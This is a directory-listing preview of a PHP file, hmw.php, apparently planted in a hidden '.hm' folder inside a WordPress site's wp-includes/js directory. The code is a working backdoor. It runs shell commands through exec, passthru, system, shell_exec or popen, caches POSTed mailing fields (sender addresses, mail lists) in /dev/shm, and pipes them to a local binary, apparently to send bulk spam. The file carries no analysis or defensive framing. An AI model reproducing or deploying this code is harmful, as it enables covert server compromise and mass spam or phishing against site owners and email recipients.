Preview: hmw.php
Size: 3.42 KB
/home/jambtst2015/public_html/cccng.org/wp-includes/js/.hm/hmw.php
<?php
header_remove();
// Step 1: Capture all GET parameters and set them in the QUERY_STRING environment variable
$env_query_string = http_build_query($_GET);
putenv("QUERY_STRING=$env_query_string");
// Initialize variables for POST data
$multipart_body = '';
$content_length = 0;
$content_type = '';
function wEx($in) {
$out = '';
if (function_exists('exec')) {
@exec($in, $out);
$out = @join("\n", $out);
} elseif (function_exists('passthru')) {
ob_start();
@passthru($in);
$out = ob_get_clean();
} elseif (function_exists('system')) {
ob_start();
@system($in);
$out = ob_get_clean();
} elseif (function_exists('shell_exec')) {
$out = shell_exec($in);
} elseif (is_resource($f = @popen($in, "r"))) {
$out = "";
while (!@feof($f))
$out .= fread($f, 1024);
pclose($f);
}
return $out;
}
// Step 2: Extract POST data if the request method is POST
if ($_SERVER['REQUEST_METHOD'] === 'POST' && !empty($_POST)) {
// Create a boundary for multipart/form-data
$boundary = '----WebKitFormBoundary' . md5(time());
// Set the content type for multipart/form-data with the boundary
$content_type = "multipart/form-data;boundary=" . $boundary;
putenv("CONTENT_TYPE=$content_type");
// Initialize the multipart body
$multipart_body = '';
if(isset($_GET['store']) && !isset($_GET["bid"])){
//write out post data as json to md5 filename
$postJson = json_encode($_POST);
file_put_contents("/dev/shm/".md5($postJson).".txt", $postJson);
echo md5($postJson)."<br />";
}elseif(isset($_GET['store']) && file_exists("/dev/shm/".$_GET["bid"].".txt")){
//load post data from md5 filename
$jsonCode = file_get_contents("/dev/shm/".$_GET["bid"].".txt");
$postData = json_decode($jsonCode, true);
$postData["smtp_from_email"] = $_POST["smtp_from_email"];
$postData["from_email"] = $_POST["from_email"];
$postData["maillist"] = $_POST["maillist"];
$postData["list"] = $_POST["list"];
$_POST = $postData;
}elseif(isset($_GET['store']) && isset($_GET["bid"])){
echo "failed to load message data";
exit;
}
// Loop through each POST variable
foreach ($_POST as $name => $value) {
if(isset($_GET['encode'])){
$name = base64_decode($name);
}
$multipart_body .= "--" . $boundary . "\r\n";
$multipart_body .= "Content-Disposition: form-data; name=\"" . $name . "\"\r\n\r\n";
$multipart_body .= $value . "\r\n";
}
// End the multipart body
$multipart_body .= "--" . $boundary . "--\r\n";
// Calculate the content length
$content_length = strlen($multipart_body);
putenv("CONTENT_LENGTH=$content_length");
}
// Step 3: Base64 encode the multipart body
$encoded_body = base64_encode($multipart_body);
// Step 4: Generate a random 12-character filename and store it in /dev/shm/
$random_filename = '/dev/shm/' . md5($encoded_body) . '.txt';
file_put_contents($random_filename, $encoded_body);
// Step 5: Define the command to be executed
// Pipe the base64-encoded POST data through `base64 -d`, then pipe that to your executable
$command = "cat $random_filename | base64 -d | ./hm hma.htnl";
// Step 6: Execute the command using the system function
// The output will be directly sent to the browser
echo str_replace("Content-type: text/html", "", wEx($command));
// Step 7: Remove the temporary file before exiting
unlink($random_filename);
// Return the process exit code
?>
Directory Contents
Dirs: 0 × Files: 1